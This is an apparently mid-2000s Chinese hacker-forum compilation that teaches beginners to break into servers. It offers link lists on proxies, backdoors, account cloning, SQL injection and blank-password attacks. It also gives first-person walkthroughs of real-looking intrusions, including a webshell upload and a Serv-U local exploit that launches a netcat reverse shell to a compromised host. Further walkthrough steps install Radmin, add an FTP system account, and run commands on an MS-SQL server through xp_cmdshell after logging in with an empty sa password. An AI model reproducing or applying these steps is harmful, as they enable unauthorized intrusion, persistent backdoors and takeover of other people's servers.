怎样提升权限,做后门
http://www.sixthroom.com/ailan/f … 2&RootID=300&ID=300
一般用户获取NT服务器Admin权限的方法
http://www.sixthroom.com/ailan/f … 2&RootID=302&ID=302
Windows NT4的安全结构(对新手有些难,了解一下吧)
http://www.sixthroom.com/ailan/f … 3&RootID=303&ID=303
第9章——关于做代理和跳板
简单介绍:
代理服务器英文全称是Proxy Cerver,其功能就是代理网络用户去取得网络信息。形象的说:它是网络信息的中转站。在一般情况下,我们使用网络浏览器直接去连接其他Internet站点取得网络信息时,须送出Request信号来得到回答,然后对方再把信息以bit方式传送回来。代理服务器是介于浏览器和Web服务器之间的一台服务器,有了它之后,浏览器不是直接到Web服务器去取回网页而是向代理服务器发出请求,Request信号会先送到代理服务器,由代理服务器来取回浏览器所需要的信息并传送给你的浏览器。而且,大部分代理服务器都具有缓冲的功能,就好象一个大的Cache,它有很大的存储空间,它不断将新取得数据储存到它本机的存储器上,如果浏览器所请求的数据在它本机的存储器上已经存在而且是最新的,那么它就不重新从Web服务器取数据,而直接将存储器上的数据传送给用户的浏览器,这样就能显著提高浏览速度和效率。更重要的是:Proxy Server (代理服务器)是 Internet链路级网关所提供的一种重要的安全功能,它的工作主要在开放系统互联 (OSI) 模型的对话层,有了对代理的了解,相信你也认识到了什么是跳板。
相关工具:
SocksCap 2.2 SOCKS调度工具
http://www.123gz.com/dzc/download/sc32r231.exe
SkSockServer1.04 代理跳板
http://www.123gz.com/dzc/download/sksockserver.zip
Snake跳板傻瓜版
http://www.123gz.com/dzc/download/sgtb.zip
代理猎手V3.1Beta1简装版
http://www.123gz.com/dzc/download/proxyhunter.zip
FTP Serv-U 4.0 正式汉化版,最常用的ftp服务程序
http://61.159.224.188/makesoftur … 627E207574756375737
slimftp 隐蔽的ftp服务器
http://www.whitsoftdev.com/files/slimftpd.zip
天雁WEB服务器 不用安装的小型web服务程序
http://www.cnzzz.com/download/do … 33352254709&Url=100
多种服务程序下载
http://www.zdnet.com.cn/download/windows/business/swlist/0,2008004954,39000268r,00.htm?sort=5
相关帖子:
代理、肉鸡、跳板的概念
http://www.sixthroom.com/ailan/f … 2&RootID=305&ID=305
代理服务器(Proxy)完全解析
http://www.sixthroom.com/ailan/f … 2&RootID=307&ID=307
如何使用代理服务器
http://www.sixthroom.com/ailan/f … 2&RootID=309&ID=309
简单制作跳板
http://www.123gz.com/dzc/sksockserver-cusky.htm
Serv-U设置教程
http://www.enanshan.com/ftp/
SocksCap32 使用详解
http://www.123gz.com/dzc/sockscap32.htm
在肉鸡上安装FTP服务器
http://www.sixthroom.com/ailan/f … 2&RootID=306&ID=306
利用 unicode 漏洞,轻松建立自己的代理服务器
http://www.123gz.com/dzc/sksockserver-nicky-1.htm#top1
特别推荐猎手与蚂蚁收藏馆
http://www.123gz.com/ (绝对值得一看)
第10章——关于终端服务(3389)
简单说明:
windows终端服务提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。图形界面和不影响当前本地用户的特性是它的最大优点。由于它是2000server及以上版本自带的功能,因此成为一个绝好的“后门”而倍受青睐。而且win98也可以成为客户端,这使得在网吧“工作”成为可能。有一点需要强调一下使用客户端登陆远程主机对当前工作的用户没有影响,而且一切动作本地用户都是看不到的。也就是说远程登陆和本地用户是在不相同的空间,两者互不干扰。
相关工具:
WIN2000客户端
http://zudu2000.myetang.com/soft/win2k.rar
winxp下的客户端 功能比2000下的更强大
http://zudu2000.myetang.com/soft/windowsXP.zip
终端服务程序的一个补丁 使本地和远程间能复制文本
http://www.sandflee.net/wawa/tools/rdpclip_hotfix.exe
web版终端客户端 使用浏览器调用ActiveX控件访问终端服务
http://www.enanshan.com/down/tswebsetup.exe
C3389.EXE 修改终端服务端口号的工具
http://www.sandflee.net/down/show.asp?id=228&down=1
Win2k终端服务器端所需文件包
http://www.netsill.com/download/download.asp?Did=1965
3389自动安装程序-djshao正式版5.0
http://netsill.com/download/download.asp?Did=2019
开启3389工具(如果要想让远程主机开启WIN2000的终端服务,请把3389.exe也传到远程主机上并运行。然后等待一个漫长的时间(由于是无人执守安装)。就可以看到远程主机的3389端口会被打开。)
http://netsill.com/download/download.asp?Did=1991
W2K终端服务客户端安装版
http://www.sandflee.net/down/show.asp?id=39&down=1
相关帖子:
关于远程启动终端服务的帖子
http://www.sixthroom.com/ailan/f … 2&RootID=385&ID=385
终端服务问题常见问答
http://www.sixthroom.com/ailan/f … 2&RootID=386&ID=386
图文讲解输入法漏洞入侵
http://www.sandflee.net/txt/list.asp?id=22
3389自动安装工具教程
http://netsill.com/download/download.asp?Did=2068
3389动画教程(密码china)
http://netsill.com/download/download.asp?Did=1990
修改终端客户端端口动画教程
http://netsill.com/download/download.asp?Did=2009
3389资料
http://www21.brinkster.com/srob/wawa/wawa/3389txt.htm
第11章——关于克隆帐号
简单说明:
克隆帐号的原理简单的说是这样:在注册表中有两处保存了帐号的SID相对标志符,一处是SAMDomainsAccountUsers下的子键名,另一处是该子键的子项F的值中。这里微软犯了个不同步它们的错误,登陆时用的是后者,查询时用前者。当用admin的F项覆盖其他帐号的F项后,就造成了帐号是管理员权限但查询还是原来状态的情况。即所谓的克隆帐号。(前辈就是前辈把大家想到的都写出来了,我实在不知道这里在加些什么了。看来也只有这样了。大家如果还有什么不明白的就到论坛里发贴子吧。
具体的看这里:
解剖安全帐号管理器(SAM)结构
http://www.sixthroom.com/ailan/f … 3&RootID=387&ID=387
明白原理后就可以手动或者用现成的工具克隆帐号了。
相关工具:
克隆ca.exe
http://www.netxeyes.org/CA.exe
检查克隆cca.exe
http://www.netxeyes.org/CCA.exe
手动克隆需要SYSTEM权限,用它 psu.exe
http://www.sandflee.net/down/show.asp?id=176&down=1
相关帖子:
工具克隆:ca和cca 请访问作者主页
http://www.netxeyes.org/main.html
psu用法:psu.exe提升为system权限
http://www.sixthroom.com/ailan/f … 2&RootID=390&ID=390
手动克隆:如何克隆管理员帐号
http://www.sixthroom.com/ailan/f … 3&RootID=388&ID=388
如何克隆管理员帐号的补充
http://www.sixthroom.com/ailan/f … 3&RootID=389&ID=389
精华黑客入门
一: 关于ping命令的一些用法:
===================================================================================
1.新兵的故事(ping篇)
http://blog.hackbase.com/wuming/archive/2005/07/20/8279.aspx
2.新兵的故事(ip篇)
http://blog.hackbase.com/wuming/archive/2005/07/19/8188.aspx
3.新兵的故事(域名篇)
http://blog.hackbase.com/wuming/archive/2005/07/19/8174.aspx
===================================================================================
关于NC的一些用法
NC是一个很不错的黑客工具一句话俩句话我也说不清楚
下面我给了关于NC使用教程的下载 大家可以去看看
二: 关于扫描器的一些使用方法(以下的下载请看<常用的扫描器用法>)
无名大哥讲了hscan的用法,其实他的用意并不是让大家只会用这一种的,是为了给大家一个启示
让大家明白扫描器的一些原理,举一反三,希望大家可以灵活的运用扫描器,要了解这些
你必须要明白什么是端口
=======================================================================
什么是端口
必须明白什么是端口。首先需要明白的一点是,我们这里所说的端口,不是计算机硬件的I/O端口,而是软件形式上的概念。服务器可以向外提
供多种服务,比如,一台服务器可以同时是WEB服务器,也可以是FTP服务器,同时,它也可以是邮件服务器。为什么一台服务器可以同时提供
那么多的服务呢?其中一个很主要的方面,就是各种服务采用不同的端口分别提供不同的服务,比如:WEB采用80端口,FTP采用21端口等。这
样,通过不同端口,计算机与外界进行互不干扰的通信。
工具提供服务类型的不同,端口分为两种,一种是TCP端口,一种是UDP端口。计算机之间相互通信的时候,分为两种方式:一种是发送信
息以后,可以确认信息是否到达,也就是有应答的方式,这种方式大多采用TCP协议;一种是发送以后就不管了,不去确认信息是否到达,这种
方式大多采用UDP协议。对应这两种协议的服务提供的端口,也就分为TCP端口和UDP端口。
=======================================================================
知道了什么的端口,才能了解怎么去扫描,为什么要去扫描,扫描有什么用处。那什么是
端口扫描:
=======================================================================
计算机打开那些端口可以通过一定的网络命令来检测,但是,我们没有必要一个个去试验,因为我们有专门的端口扫描工具。
工具扫描方式的不同,端口扫描器分为两者:
第一种针对一个连续网段扫描特定端口。这种工具常用于寻找特定主机或者特定服务,比如WEB服务器,也可以用来检测是否中了木马,比如检
测7626端口来检测冰河。这种工具有NetBrute。
第二种针对一台特定的服务器扫描所有端口。这种工具常用于攻击一台特定主机以前搜集此主机的大致信息,确定攻击方案。这种工具有
SuperScan。
========================================================================
同时,无名大哥还讲了一些关于端口的防御的查看大家可以去看看:
http://bbs.hackbase.com/viewthread.php?tid=2717765&fpage=1
(同时我也将比较常用的前几千个端口的名称打包了 方便大家学习)
看到了把,其实无名大哥讲的其实都是一些基础中的基础,其中的流程是这样
首先呢,要得到你想要入侵或者说的了解的目标的信息,尽可能多的信息,
比如,IP(最基本的),服务器名称 版本 以及它所存在的漏洞等等等等
在次呢,就是要把你所得到的这些信息加以分析 看看它有什么样的漏洞 然后加
以利用
最后呢就是用工具或者说你知道的知识 去进入对方的电脑了
这就是一般的入侵所需要的流程 那现在我们就这个流程 来介绍一下在这个流程当中
所要需要懂的了解的一些知识
========================================================================
========================================================================
第一步:得到目标的信息
得到信息的方法分很多种 现在就我知道的几种流行的几种方法向大家做一个介绍
1:从端口扫描
上面我们已经介绍了一些关于端口的知识,从那里我们可以知道,一台计算机
连接到INTERNET,需要从从每个开起的端口中,得到所需要的服务,所以:
我们就应该掌握一下端口扫描,通过端口扫描我们就可以很快速的得到一台主机
的信息.具体的端口扫描器的使用方法我已经给大家准备好了 在文章的下面有
下载 我在这里说一说几个比较常用的软件:
⒈ x-scan
⒉ 流光
⒊ S(目前我觉的最快的有个扫描器)
⒋ x-way
…………………..
其实有很多 我说也说不完 只是简单的介绍了一下 我在下载里面介绍了几中扫描器
的使用方法,其实我觉的效果有的不一样,但是原理都一样 都是为了探测目标的信息
的.在这里,我就不一一的列举每个软件的教程了,因为这样的太多,具体的使用方法
和诀窍还要在你不段使用中才能掌握的.
2:从一些开起的端口中获得
比如一些系统的版本.我们就拿FTP来说把
=========================================================================
FTP(File Transfer Protocol,文件传输协议是Internet上使用非常广泛的一种通讯协议,它是为Internet用户进行文件传输(包括文件的上传
和下载)而制定的。要想实现FTP文件传输,必须在相连的两端都装有支持FTP协议的软件,装在您的电脑上的叫FTP客户端软件,装在另一端服
务器上的叫做FTP服务器端软件。
=========================================================================
当你连接到服务器端的时候,回出现下面这样的信息
Microsoft FTP Service (Version 5.0)
从这里我们就可以看到FTP的Version是5.0的
象这样的信息还很多如UNIX里面主机连接以后也会显示相应的信息
还有就是在用PING命令时,在TTL的返回植里面也可以判断出主机的系统类型
第二步:收集信息 加以分析 寻找入侵方法
当用我们把目标的信息加以全面的分析的话一般你就可以得到很多可以入侵的资料
现在我就把现在比较流行的几种入侵的方法简单的介绍一下
NO1:———–SQL注入
==========================================================================
SQL注入 传说在微软的主页里面有时候都可以看到 这样的漏洞在现在很流行
1,什么是SQL注入?
SQL注入,就是利用欺骗的方式,通过网页的查询功能,或查询命令注入。
当用户来到网站,会提交一些数据,再到数据库进行查询,确定此用户的身份。
举个简单的例子来说吧,你去一个站点的论坛,那么,你会输入你的用户名和
密码,点“确定”,网站会通过数据库的查询来判断你是不是他们的用户,
你的用户名和密码是否正确。而利用SQL注入,通过构造特殊的语句,来查找我
们所想要得到的信息,如管理员的帐号密码。以下,小林用了
http://xxx.xxx.com
来表示一个存在注入漏洞的网页。
2,助手篇,
先把IE菜单-工具-Internet选项-高级-显示友好 HTTP 错误信息前面的勾去掉。
否则,不论服务器返回什么错误,我们都只能看到“HTTP 500服务器错误”,不能获得更多的提示信息
3,哪些网页能利用?
我们去找一些要提交数据的网页,如:登陆页面,查找页面,添加页面等
后缀如asp,jsp,cgi,php网页,如果是静态的那就另外说了
这里给出了菜鸟的注入的一篇文章 写的很不错 大家可以去看看
http://bbs.hackbase.com/viewthre … ght=SQL%D7%A2%C8%EB
=========================================================================
具体的入侵方法见下载(SQL注入天书之ASP注入漏洞全接触)
通过SQL注入 几乎可以使整个网站都覆灭
当然 对于上面教程所将的那种方法是很难理解的 但是那只是理论 我们要理论和
实际相结合 所以 就介绍几种比较不错的软件把
1: 明小子的Domain3.5[旁注专用,WHOIS查询、上传页面及后台检测、木马上传、数据库浏览及加密解密]
2: 阿D-SQL注射2.3.rar
3: 还有有名的NB商业版本
这些工具都是现在比较流行的 关于入侵的方法以及技巧 我给出黑基的
一篇文章供大家学习
http://bbs.hackbase.com/viewthread.php?tid=2723934&fpage=1
希望大家可以多多的去实习一下 这样才能掌握技巧 不能一味的只是看教程
看动画 看什么说明 这样只是一个引导 具体的方法还要自己亲身去实践
其实说到注入 我们就顺便来说一下“脚本入侵”
===========================================================================
所谓的脚本入侵,一般指的就是现在的SQL Injection 漏洞利用攻击,JS脚本
HTML脚本攻击 和一些象上传 注入 爆库 跨站 cookies欺骗的一些攻击
其实就是因为代码验证不严,过滤不全导致的用户提交恶意的代码
上面已经介绍了SQL的 下面介绍其他的几个常见的
一:爆库原理和基本方法
===========================================================================
请到这里下载
http://bbs.hackbase.com/attachme … c4c9&download=1
===========================================================================
二:cookies欺骗
===========================================================================
什么是cookies呢,我这里给大家一个专业的解释,Cookies是一个储存于浏览器目录中的文本文件,记录你访问一个特定站点的信息,且只能
被创建这个ookies的站点读回,约由255个字符组成,仅占4KB硬盘空间。当用户正在浏览某站点时,它储存于用户机的随机存取存储器RAM中,
退出浏览器后,它储存于用户的硬盘中。储存在Cookies中的大部分信息是普通的,如当你浏览一个站点时,此文件记录了每一次的击键信息和
被访站点的地址等。但是许多Web站点使用Cookies来储存针对私人的数据,如:注册口令、用户名、信用卡编号等。
cookies欺骗,就是在只对用户做cookies验证的系统中,通过修改cookies的内容来
得到相应的用户权限登录。具体的内容已经方法请到这里下载
http://bbs.hackbase.com/attachme … e3b7&download=1
===========================================================================
三:跨站
===========================================================================
本人比较懒了 呵呵 希望大家原谅 给出地址
http://bbs.hackbase.com/viewthre … ighlight=%2Bharkboy
===========================================================================
四:关于HTML注射
===========================================================================
http://bbs.hackbase.com/viewthread.php?tid=2748726
===========================================================================
NO~2 空口令入侵
===========================================================================
听到空口令入侵 我想不用我在多解释什么了把 空口令 那不就是密码为空 恩
就是这样的 现在很多的服务器的ADMIN(管理员)密码都为空
比如:WIN2000 WIN-XP WIN-2003中的管理员密码
SQL的SA密码
MYSQL的root密码
FTP中的匿名 GUEST
……………….
好多 写不完 大家在使用扫描器的时候 一般服务出现空口令的会提示 然后你就用相应
的连接器连接就行了
比如:SQL[1433]端口 如果得到了NULL的SA 就可以用SQLTOOL去连接 然后提权
3389中的ADMINISTRATOR为NULL的话 可以用远程终端连接器连接
===========================================================================
NO~3 漏洞入侵
===========================================================================
提到漏洞入侵 最最简单的输入法漏洞大家应该听说过把 漏洞入侵就是由于软件或者
说是系统内部的错误导致的漏洞 一般来说有
缓冲区溢出漏洞
IE的任意执行代码漏洞
文件名错误解码漏洞
认证漏洞
SQL注入漏洞
………………..
最新比较出名的有动网论坛(DVBBS)的漏洞 一个论坛的程序
几乎漏洞是层出不穷 大家可以到网上去搜索一下 很多关于这方面的教程和动画
下面给出几个黑基上比较好的教程
===========================================================================
动网论坛权限提升漏洞
http://bbs.hackbase.com/viewthre … F%CD%F8%C2%DB%CC%B3
最新动网漏洞利用工具(提升为后台管理员)
http://bbs.hackbase.com/viewthre … hlight=%B6%AF%CD%F8
动网提升再提升之老鬼不是人
http://bbs.hackbase.com/viewthre … hlight=%B6%AF%CD%F8
SQL注入入侵动网
http://bbs.hackbase.com/viewthre … hlight=%B6%AF%CD%F8
============================================================================
缓冲区溢出漏洞介绍
就像老师讲的倒啤酒的例子,向一个杯子里灌啤酒,杯子装不下了,啤酒就溢
出了。在计算机内存中,当某个数据,超过了处理程序限制的范围时,该数据就会
造成程序的执行溢出 这其实都是在设计软件过程当中所遗留下来的漏洞 其实象这种
漏洞的攻击大家可以关注一些比较好的安全站点 他们都有对现在比较新的溢出漏洞
的教程以及攻击程序比如绿盟 安全焦点……
下面我们来简单介绍一下最进比较有名的ms05039漏洞
ms05039漏洞
Microsoft Windows即插即用功能远程缓冲区溢出漏洞(MS05-039)
Microsoft Windows即插即用(PnP)功能允许操作系统在安装新硬件时能够检测到这些设备。
Microsoft Windows即插即用功能中存在缓冲区溢出漏洞,成功利用这个漏洞的攻击者可以完
全控制受影响的系统。
这是绿盟的关于ms05039漏洞的介绍 大家注意了“攻击者可以完全控制受影响的系统”
根据这点 我们拿软件来做个实验(具体实验过程见下载)
好了 这就是一般的益处漏洞的攻击过程 首先是通过软件程序来溢出 然后用NC连接溢出
的端口就行了~
=============================================================================
上面介绍了一般的攻击流程的几个简单的攻击的介绍 让你对黑客有一定的了解
如果你可以去实验的话 我想你更加会有成就感 其实 我觉的 能支撑我到现在都
对黑客这们艺术性的学科都感兴趣的就是成就感了 希望大家可以去亲身的感受
一下 记得我说的话 电脑这东西 是需要实践的 没有实践 等于零 但是花说回来
虽然你可以拿到几个WEBSHELL了 你有了自己的肉鸡了 你就会满足了吗 我想你不
会 至少我不会 所以呢 我还是希望一些正处于菜鸟阶段的(包括已经脱离菜鸟阶
段的“高手”们)电脑是需要不断的学习的 就算你是2005年的黑客 但是到了2006
我想那时候的SQL注入可能就不是那么的简单了 NULL空口令的煞笔笨蛋可能就越来
越少了 这时候我们需要不段的去学习 去深入的了解问题才行 小弟不才 在这里
我提出了几个我们应该注意学习的几个方面 希望大家给点建议:
1:学习程序设计(一个永远也不会变的话题)除非那天电脑都实现智能话了
程序是基础 也可以说是基础当中的基础 所以我建议大家一定要去学习一下
比如C/C++(我认为好难哦)我觉的 如果现在你对C/C++是个高手中的高手的话 没有
那个人不会对你尊敬的 程序设计是一种复杂的技术, 我没辨法在这提供完整的学习
步骤. 但是我能告诉你一些在书本上和课堂上所没有的东西 .几乎全部最好的 黑客
们都是自习而来的. 读别人的程序码 和 写程序, 这两项是不错的方法.
学习写程序就像在学习写一种良好的自然语言, 最好的方法是去看一些专家们所
写的东西, 然后写一些你自己的东西, 然后读更多, 再写更多 … 然后一直持续
一直到你发展出一种属于自己的风格和特色. 这个不相信你可以去问问黑基里面
编程的好手Gui哥, 小珂, 无情,无名…..(还有好多) 虽然他们不算的上是编程
史上的好手(呵呵)但是他们一定会给你一个满意的答复 一个对于菜鸟来说最满
意的答复 所以 希望大家可以去关注一下这方面的知识
2:学习使用脚本语言
其实这和程序编程设计是有一定联系的 需要学习的语言有html,asp,php,等脚本
语言,最好熟悉jsp与.net等。多看看数据库相关的知识是有很大好处的
3:对于网络的概念 基础 应当有个理论上的了解
比如TCP/IP 网络是黑客生存的基本环境 所以我们要适应这个环境就必须要了解
这个环境里面的每一个东西
4:系统的漏洞以及黑客常用的一些软件 系统常用的一些软件
熟悉于系统的漏洞 为你能成为一个好的黑客奠定了基础 建议应该及时的关注
各个系统的漏洞以及信息 这样才能以最简便的方式来进行入侵或者说对系统
的修补 熟悉黑客的软件是你加快速度的交好的途径 现在的黑客软件层出不穷
都是针对各个漏洞的最好利器 所以 大家应该多多的熟悉于小软件的利用和原理
熟悉系统:2000 XP 2003 UNIX 等 都是常用的系统 我们应该熟悉于我们平常
超做的操作系统 别教程上面将添加到注册表里面什么什么 你连注册表是什么
在那里都不知道 你怎么学 你怎么去添加 还有人竟然不知道CMD怎么打开 还要
学什么侵入对方的电脑 我晕 对于这样的人 我觉的你还是放弃把 黑客这样的东西
不适合您D
好了 关于学习的东西 就简单的介绍到这里了
===============================================
以下是几个菜鸟经典问题的回答 说百了就是关于问题的教程 希望对大家有用哦
===============================================
IPC$一个不愿意提但是还是要提的问题
http://bbs.hackbase.com/viewthread.php?tid=2742972&fpage=1
对注册表的释疑
http://bbs.hackbase.com/viewthread.php?tid=2750114&fpage=1
入门者如何获取肉鸡
http://bbs.hackbase.com/viewthread.php?tid=8889&fpage=1
操作系统简介——-(菜鸟篇)
http://bbs.hackbase.com/viewthread.php?tid=23445&fpage=1
菜鸟QQ防黑大全
http://bbs.hackbase.com/viewthread.php?tid=451&fpage=1
知道对方IP入侵别人的电脑
http://bbs.hackbase.com/viewthread.php?tid=6304&fpage=2
hacker 学习方法
http://bbs.hackbase.com/viewthread.php?tid=14586&fpage=2
FTP信息代码全解
http://bbs.hackbase.com/viewthread.php?tid=21698&fpage=2
木马【菜鸟篇】
http://bbs.hackbase.com/viewthread.php?tid=10722&fpage=2
局域网应用全攻略
http://bbs.hackbase.com/viewthread.php?tid=8095&fpage=3
ASP入门简单教材
http://bbs.hackbase.com/viewthread.php?tid=20935&fpage=3
写给菜鸟,打开对方CMD的三种方法
http://bbs.hackbase.com/viewthread.php?tid=20568&fpage=3
Windows进程完全解析
http://bbs.hackbase.com/viewthread.php?tid=2737090&fpage=1
新手入门强力资料
http://bbs.hackbase.com/viewthread.php?tid=2735507&fpage=1
Windows系统文件夹、文件详解
http://bbs.hackbase.com/viewthread.php?tid=2741411&fpage=1
路由器基础知识
http://bbs.hackbase.com/viewthread.php?tid=2729051&fpage=1
黑客新手基础知识16问答
http://bbs.hackbase.com/viewthread.php?tid=2721738&fpage=1
GOOGLE搜索高级技巧大集合
http://bbs.hackbase.com/viewthread.php?tid=2724538&fpage=1
SA空口令入侵到3389终结完整编.
http://bbs.hackbase.com/viewthread.php?tid=2721173&fpage=1
计算技术语大全
http://bbs.hackbase.com/viewthread.php?tid=2702085&fpage=2
入侵命令详解
http://bbs.hackbase.com/viewthread.php?tid=2714225&fpage=2
黑客技术从0开始
http://bbs.hackbase.com/viewthread.php?tid=2714811&fpage=2
中级黑客入门教程
http://bbs.hackbase.com/viewthread.php?tid=2714350&fpage=2
整理的一份综合教程
http://bbs.hackbase.com/viewthread.php?tid=27774&fpage=3
彻底渗透远程登陆Telnet
http://bbs.hackbase.com/viewthread.php?tid=2689681&fpage=3
黑客入门到精通
http://bbs.hackbase.com/viewthread.php?tid=2664851&fpage=3
HTML语言入门
http://bbs.hackbase.com/viewthread.php?tid=38873&fpage=3
网络安全讲座之:侦察与工具
http://bbs.hackbase.com/viewthread.php?tid=2702139&fpage=3
黑客入门之黑客术语速查
http://bbs.hackbase.com/viewthread.php?tid=2665136&fpage=4
教你如何查看自己开放的端口!
http://bbs.hackbase.com/viewthread.php?tid=2686905&fpage=4
常见端口详解及部分攻击策略
http://bbs.hackbase.com/viewthread.php?tid=2686547&fpage=4
网络经典命令行
http://bbs.hackbase.com/viewthread.php?tid=15907&fpage=5
网络MAC地址解释
http://bbs.hackbase.com/viewthread.php?tid=356&fpage=5
3389的详细解答
http://bbs.hackbase.com/viewthread.php?tid=2637804&fpage=6
动态IP地址的捕获及应用
http://bbs.hackbase.com/viewthread.php?tid=351&fpage=7
嗅探原理与反嗅探技术详解
http://bbs.hackbase.com/viewthread.php?tid=6500&fpage=7
DNS 系统解析过程概述
http://bbs.hackbase.com/viewthread.php?tid=355&fpage=7
黑客入门攻击及防范
http://bbs.hackbase.com/viewthread.php?tid=2740086&fpage=1
webshell提权
http://bbs.hackbase.com/viewthread.php?tid=2744975&fpage=1
关于虚拟机
http://bbs.hackbase.com/viewthread.php?tid=2729464&fpage=1
用GOOGLE找肉鸡
http://bbs.hackbase.com/viewthread.php?tid=2686982&fpage=2
SQL INJECTION注射步骤
http://bbs.hackbase.com/viewthread.php?tid=24746&fpage=3.
提升权限总结-
如何绕过防火墙提升权限
本文讲的重点是webshell权限的提升和绕过防火墙,高手勿笑。
废话少说,咱们进入正题。
首先确定一下目标:http://www.sun***.com ,常见的虚拟主机。利用Upfile的漏洞相信大家获得webshell不难。我们这次获得这个webshell,不是DVBBS,而是自由动力3.6的软件上传过滤不严。网站http://www.sun***.com/lemon/Index.asp是自由动力3.6文章系统。Xr运用WinHex.exe和WSockExpert.exe上传一个网页木马newmm.asp,用过动鲨的door.exe的人都知道,这个是上传asp木马内容的。于是,上传海洋2005a,成功获得webshell。
测试一下权限,在cmd里运行set,获得主机一些信息,系统盘是D盘,也说明了我们的webshell有运行权限的。那我们看看C盘有什么呢?难道是双系统?浏览后发现没有什么系统文件,只有一些垃圾文件,晕死。没关系,再来检查一下,虚拟主机都有serv-u的,这台也不例外,是5.0.0.8的。呵呵,是有本地溢出的呀,挖哈哈。
思路:上传serv-u本地溢出文件srv.exe和nc.exe利用nc来反连接获得系统shell。大家是不是发现海洋2005a那个上传的组件不好用(反正我总遇到这个问题),没关系,用rain改的一个无组件上传,一共有3个文件,up.htm, upload.asp和uploadclass.asp。upload.asp和uploadclass.asp上传到同一个文件夹,up.htm是本地用的,修改up.htm里的链接地址为:http://www.sun***.com/lemon/upload.asp就可以上传了。
传上了srv.exe和nc.exe在H:/long/sun***/lemon(网站目录)后,发现没有运行权限。没关系,根据经验,一般系统下D:/Documents and Settings/All Users/是应该有运行权限的。于是想把文件copy过去,但是发现我们的webshell没有对D盘写的权限,晕死。
可以浏览D:/program files/serv-u/ServUDaemon.ini,不能改,难道要激活成功教程serv-u的密码,晕,不想。
不可以这么就泄气了,我突然想到为什么系统不放在C盘了,难道C盘是FAT32分区的?(后来证明了我们的想法。这里说一下,如果主机有win98的系统盘,那里99%是FAT32分区的。我们还遇到过装有Ghost的主机,为了方便在DOS下备份,它的备份盘一般都是FAT分区的。)如果系统盘是FAT32分区,则网站就没有什么安全性可言了。虽然C盘不是系统盘,但是我们有执行权限。呵呵,copy srv.exe和nc.exe到c:/,运行 srv.exe “nc.exe –e cmd.exe 202.*.*.* 888”,这里的202.*.*.*是我们的肉鸡,在这之前我们已经在肉鸡上运行了nc –l –p 888。我们在学校内网里,没有公网ip,不爽-ing。
我们成功获得一个系统shell连上肉鸡。(看起来简单,其实这里我们也遇到过挫折,我们发现有些版本的nc居然没有-e这个参数,还以为全世界nc功能都一样。后来又发现不同版本的nc互连不成功,会出现乱码,没办法用。为此,上传n次,错误n次,傻了n次,后来终于成功了。做黑客还真得有耐心和恒心。)
高兴之余,我们仍不满足,因为这个shell实在是太慢了。于是,想用我们最常用的Radmin,其实管理员一按Alt+Ctrl+Del,看进程就能发现r_server了,但是还是喜欢用它,是因为不会被查杀。好了,上传admdll.dll,raddrv.dll,r_server.exe到H:/long/sun***/lemon,再用刚才nc得到的shell把它们copy到d:/winnt/system32/下,分别运行:r_server /install , net start r_server , r_server /pass:rain /save 。
一阵漫长的等待,终于显示成功了。兴冲冲用radmin连上去,发现连接失败。晕死,忘了有防火墙了。上传pslist和pskill上去,发现有backice,木马克星等。Kill掉他们虽然可以登陆,但服务器重启后还是不行,终不是长久之计呀。防火墙是不防21,80等端口的,于是,我们的思路又回到了serv-u上了。把他的ServUDaemon.ini下载下来,覆盖本机的ServUDaemon.ini,在本机的serv-u上添加一个用户名为xr,密码为rain的系统帐号,加上所有权限。再用老办法,上传,用shell写入D:/program files/serv-u/里,覆盖掉原来的ServUDaemon.ini。虽然又等了n长时间,但是成功了,于是用flashfxp连上,发生530错误。郁闷,怎么又失败了。(根据经验这样应该就可以了,但为什么不行没有想通,请高手指点。)
不管了,我们重启serv-u就ok了,怎么重启呢,开始想用shutdown重启系统,但那样我们就失去了nc这个shell,还可能被发现。后来,眼睛一亮,我们不是有pskill吗?刚才用pslist发现有这个进程:ServUDaemon 。把它kill了。然后再运行D:/program files/serv-u/ ServUAdmin.exe ,这里要注意不是ServUDaemon.exe 。
好了,到这里,我们直接ftp上去吧,ls一下,哈哈,系统盘在我的掌握下。我们能不能运行系统命令呢?是可以的,这样就可以:
ftp>quote site exec net user xr rain /add
在webshell上运行net user,就可以看见添加成功了。
整个入侵渗透到这就结束了,在一阵后清理打扫后。我们就开始讨论了。其实,突破防火墙有很多好的rootkit可以做到的,但是我们觉得系统自带的服务才是最安全的后门。
MS-SQL空口令结合pcanywhere的功击
连接IP主机: 211.154.xxx.xx…
发送 56 个字节…
接收到 56 个字节! 历时: 0毫秒
结论: IP主机正在与Internet连接中…
接着选择打开扫描器x-way,选择高级扫描功能。输入目标IP,开始扫描。数分钟后得到扫描结果如下(结果经整理):
主机信息
主机名:BEWDB01NOK
80(HTTP)
21(FTP Control)
25(SMTP)
443(HTTPS)
1433(MSSQL)
5631(PCAnyWhere)
用户列表
Administrator (Admin) Guest hacker (Admin) IUSR_BEWDB01NOK IWAM_BEWDB01NOK ogilvy remoteuser (Admin)
漏洞:
//../readme.txt (HTTP: 200 )
/msadc/msadcs.dll (HTTP: 200 )
/iisadmpwd/achg.htr (HTTP: 200 )
/_AuthChangeUrl (HTTP: 200 )
/?PageServices (HTTP: 200 )
上一步中得到目标服务器的相关有用信息。可以发现扫描结果中并无可用的asp/cgi漏洞。而从所开端口来看,
21(FTP Control)
1433(MSSQL)
5631(PCAnyWhere)
只有这三个可用。在万一得已的情况下,我是不会用暴力破ftp的。那么只好从
1433,5631这两个端口入手了!我们知道,1433是ms-sql的服务端口,默认情况下它的最高权限用户帐号SA口令为空。如果管理员疏忽了这一点,没有给SA一个口令的话,事情就好办了!先来试试看。从www.tianxing.org下一个ms-sql的客户端,在Host框中输入目标ip:211.154.xxx.xx
Username为sa
password框空,连接:
SQL>Connecting 211.154.xxx.xx
SQL>Connected to 211.154.xxx.xx
呵呵!看来对方管理员没有对sa设置一个口令!太好了!可以在客户端以xp_cmdshell ” “的形式运行任意dos指令了!dir一下试试看:
SQL>Command: xp_cmdshell “dir c:/”
驱动器 C 中的卷没有卷标。
卷的序列号是 5CBD-664C
卷的序列号是 5CBD-664C
c:/ 的目录
c:/ 的目录
01-12-20 08:13p <DIR> 2u2u
01-07-23 08:10p 0 AUTOEXEC.BAT
01-11-28 04:02p 84 biaoti.txt
01-07-23 08:10p 0 CONFIG.SYS
01-11-22 11:49a <DIR> InetPub
01-10-25 11:12a 15,360 kkkk.XLS
01-07-24 12:09p <DIR> MSSQL7
01-12-12 11:00a 134,217,728 pagefile.sys
01-11-30 10:59a <DIR> Program Files
01-09-04 02:43p 136 sp_attach.sql
